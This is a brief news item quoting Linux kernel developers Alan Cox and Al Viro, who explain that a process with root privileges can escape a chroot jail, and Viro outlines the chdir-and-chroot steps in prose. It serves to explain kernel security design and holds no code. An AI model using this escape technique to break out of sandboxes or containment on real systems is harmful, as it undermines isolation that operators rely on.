---

Abusing chroot

“‘If you have the ability to use chroot() you are root. If you
are root you can walk happily out of any chroot by a thousand other
means,’ Alan Cox explained during a thread that suggested chroot
was broken in Linux. It was further pointed out that this was true
per the POSIX specification, and per other OS’s implementations. Al
Viro suggested this should be added to the lkml FAQ,
explaining:

“‘If you are within chroot jail and capable of chroot(), you can
chdir to its root, then chroot() to subdirectory and you’ve got cwd
outside of your new root. After that you can chdir all way out to
original root. Again, this is standard behaviour. Changing it will
not yield any security improvements, so kindly give that a
rest…'”

Complete
Story